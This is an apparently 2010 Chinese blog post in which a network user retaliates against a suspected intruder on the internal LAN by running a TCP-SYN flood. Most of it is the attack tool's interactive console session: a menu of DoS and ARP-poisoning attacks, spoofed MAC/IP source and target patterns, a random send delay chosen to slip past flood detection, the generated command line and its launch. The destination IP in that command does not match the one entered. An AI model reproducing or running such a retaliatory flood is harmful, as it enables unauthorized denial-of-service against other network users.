实施DDOS环境之 TCP-SYN Flood Attack to Cracker

今天上午一大早就检测到内网有人恶意作为（排除ARP中毒），so give a little color see see.. 

* Initializing
* Starting attack assistant

  Select operation mode:
  > 1. Local
  > 2. Remote (Single Daemon)
  > 3. Remote (Multiple Daemons)

  Enter option [1-3]: 1

  Select network interface:
  > 1. Realtek 10/100/1000 Ethernet NIC       (Microsoft's Packet Scheduler)

  Enter option [1-1]: 1

  Select IP version:
  > 1. IPv4
  > 2. IPv6

  Enter option [1-3]: 1

  Is packet route NAT-Free?

  Say 'n' here if the target machine is on a
  different subnet than you such as hosts on the internet.

  Enter choice [y or n]: y

  Is network EAP-Free?

  Say 'n' here if the network you are on is using the
  Extensible Authentication Protocol (EAP). This would be
  the case if you are connected with a wireless network card.

  Enter choice [y or n]: y

  Select attack type:
  > 1.  ARP-Request flood                   DoS
  > 2.  ARP-Cache poisoning                 MITM
  > 3.  PPPoE session initiation flood      DoS
  > 4.  Blind PPPoE session termination     DoS
  > 5.  ICMPv4-Echo flood                   DoS
  > 6.  ICMPv4-Smurf attack                 DDoS
  > 7.  ICMPv4 based TCP-Connection reset   DoS
  > 8.  TCP-SYN flood                       DoS
  > 9.  TCP-Land attack                     DoS
  > 10. Blind TCP-Connection reset          DoS
  > 11. UDP flood                           DoS
  > 12. DNS-Query flood                     DoS
  > 13. DHCP-Discover flood                 DoS
  > 14. DHCP starvation                     DoS
  > 15. DHCP-Release forcing                DoS
  > 16. Cisco HSRP active router hijacking  DoS

  Enter option [1-16]: 8

  Enter source pattern:

    Pattern format:
      [HW-Address]-[IP-Address]@[Port]

  For additional informations about address patterns
  and wilcard based randomization see README or man pages.

  > D2:4C:5B:D3:A4:BD-192.168.177.81@44444

  Enter destination pattern:

    Pattern format:
      [HW-Address]-[IP-Address]@[Port]

  For additional informations about address patterns
  and wilcard based randomization see README or man pages.

  > 00:24:8C:A8:04:51-192.168.177.47@44444

  Activate random send delay?

  A random send delay can be usefull to break
  flood detection mechanisms but will slow down
  the packet rate of the attack.

  Enter choice [y or n]: y

  Attack usage:

  -I 1 -a tcp -f s -A 4
  -s D2:4C:5B:D3:A4:BD-192.168.177.81@44444 -d 00:24:8C:A8:04:51-192.168.104.47@44444
           -E 1000

  Would you like to execute the attack now?

  Enter choice [y or n]: y

* Opening network interface (/Device/NPF_{D5E6FDA0-1AFA-42E1-AE19-D3E5AB9C9096})

* Launching attack

  Press any key to stop

.......

 

 

 

shf#show clock
16:05:43.579 cn Thu Apr 22 2010

时间到下午，现在发现这个家伙是变本加厉开始在内网乱搞了，不停在更改IP，不和他玩了，直接屏蔽MAC。